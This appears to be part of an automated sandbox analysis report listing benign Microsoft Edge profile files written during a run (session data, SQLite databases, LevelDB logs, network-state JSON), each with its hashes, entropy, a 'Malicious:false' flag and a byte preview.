                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379538502196996

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1443
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8181031622112718
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:3bHlea/5ksPXcikpsAF4unxctLp3X2amEtG1Chq9CRG3i69QKkOAM4b:3LPAzFKLp2FEkChtRLHOp
                                                                                                                                                                                                                                                                                                        MD5:609E1DE43799294DD336752D566FA785
                                                                                                                                                                                                                                                                                                        SHA1:BC7EDA781072C6C7227D88B279581C8903670071
                                                                                                                                                                                                                                                                                                        SHA-256:554EC628722CB7A81A606C0BEBA0C0304969B3767113FAD4F887157EA6494BB8
                                                                                                                                                                                                                                                                                                        SHA-512:893471ECFA1CB8790D49E1913CA44E4A96149FAA144DC6370241DFC75857F517F6C52D89727ED2689D2A17B6BC24929765548AE9AF753578D499F715EDBFC685
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SNSS........z.y............z.y......".z.y............z.y........z.y........z.y........z.y....!...z.y................................z.y.z.y1..,....z.y$...f7d63829_6d7f_4ea3_9f72_e393d960e41b....z.y........z.y....0z..........z.y....z.y........................z.y....................5..0....z.y&...{46F3A197-DB49-410A-81B3-94975C835573}......z.y........z.y...........................z.y............z.y........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......d54G.*..e54G.*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                        MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                        SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                        SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                        SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):356
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.143622894495237
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXeyq2PN723oH+Tcwt7Uh2ghZIFUt8EXI1Zmw+EXfRkwON723oH+Tcwt7Uh2gnLJ:ZeyvVaYebIhHh2FUt8KG/+KfR5OaYebs
                                                                                                                                                                                                                                                                                                        MD5:0EFA28629E85CD812BBABB7E5DAC7800
                                                                                                                                                                                                                                                                                                        SHA1:1E79E2C070A81B01F03357D29E2D0736C882DC35
                                                                                                                                                                                                                                                                                                        SHA-256:0F8FAF09C40DC403753353F019B29B8AD27F06A77E47D78E9B96E76F61F58755
                                                                                                                                                                                                                                                                                                        SHA-512:93933091B379D47D2564792E95C4CB0B2890DB35240E24A61926F54D37BB57CD833FA5B02962AA0C7D98032C721855A4FBB9979F7F0DD1CCDE5386AE5BB68C4B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.683 1be4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/24-13:28:19.683 1be4 Recovering log #3.2024/12/24-13:28:19.684 1be4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):356
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.143622894495237
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXeyq2PN723oH+Tcwt7Uh2ghZIFUt8EXI1Zmw+EXfRkwON723oH+Tcwt7Uh2gnLJ:ZeyvVaYebIhHh2FUt8KG/+KfR5OaYebs
                                                                                                                                                                                                                                                                                                        MD5:0EFA28629E85CD812BBABB7E5DAC7800
                                                                                                                                                                                                                                                                                                        SHA1:1E79E2C070A81B01F03357D29E2D0736C882DC35
                                                                                                                                                                                                                                                                                                        SHA-256:0F8FAF09C40DC403753353F019B29B8AD27F06A77E47D78E9B96E76F61F58755
                                                                                                                                                                                                                                                                                                        SHA-512:93933091B379D47D2564792E95C4CB0B2890DB35240E24A61926F54D37BB57CD833FA5B02962AA0C7D98032C721855A4FBB9979F7F0DD1CCDE5386AE5BB68C4B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.683 1be4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/24-13:28:19.683 1be4 Recovering log #3.2024/12/24-13:28:19.684 1be4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):435
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.21313550656892
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NIF4q2PN723oH+TcwtzjqEKj3K/2jMGIFUt8EsIJZmw+EoqFkwON723oH+Tcwtzg:VvVaYebvqBQFUt8W/+KF5OaYebvqBvJ
                                                                                                                                                                                                                                                                                                        MD5:AC37109AF01DFFD14CB7523ADB4BA1E9
                                                                                                                                                                                                                                                                                                        SHA1:EB64BB245C490860B0FD5E5FE8987152566B0D4C
                                                                                                                                                                                                                                                                                                        SHA-256:568BB091B9F0CCAA542558F99CD3E5DF62BD755324290E103ADB40548E0D7A2D
                                                                                                                                                                                                                                                                                                        SHA-512:8731FFD3E1ABF50B54BA830D98E6184A662867E4C1E0982559EB2A4CF82B253397C2512E93EE7C07C3BF4B0C11A6C9E1BB60B69724D801805D234D2996BE47E1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.833 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/24-13:28:20.841 b90 Recovering log #3.2024/12/24-13:28:20.845 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):435
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.21313550656892
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NIF4q2PN723oH+TcwtzjqEKj3K/2jMGIFUt8EsIJZmw+EoqFkwON723oH+Tcwtzg:VvVaYebvqBQFUt8W/+KF5OaYebvqBvJ
                                                                                                                                                                                                                                                                                                        MD5:AC37109AF01DFFD14CB7523ADB4BA1E9
                                                                                                                                                                                                                                                                                                        SHA1:EB64BB245C490860B0FD5E5FE8987152566B0D4C
                                                                                                                                                                                                                                                                                                        SHA-256:568BB091B9F0CCAA542558F99CD3E5DF62BD755324290E103ADB40548E0D7A2D
                                                                                                                                                                                                                                                                                                        SHA-512:8731FFD3E1ABF50B54BA830D98E6184A662867E4C1E0982559EB2A4CF82B253397C2512E93EE7C07C3BF4B0C11A6C9E1BB60B69724D801805D234D2996BE47E1
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.833 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/24-13:28:20.841 b90 Recovering log #3.2024/12/24-13:28:20.845 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\098c64c3-d28e-41af-9ba7-d536a77528e5.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0fdcbf0a-5e36-4712-b051-cdf918dd7de5.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\391d3389-05f2-4297-b65e-abc1e20cf2e9.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6c57aed4-df84-47f0-8caf-e30d2fae69e9.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF4ae7c.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                        MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                        SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                        SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                        SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f...............

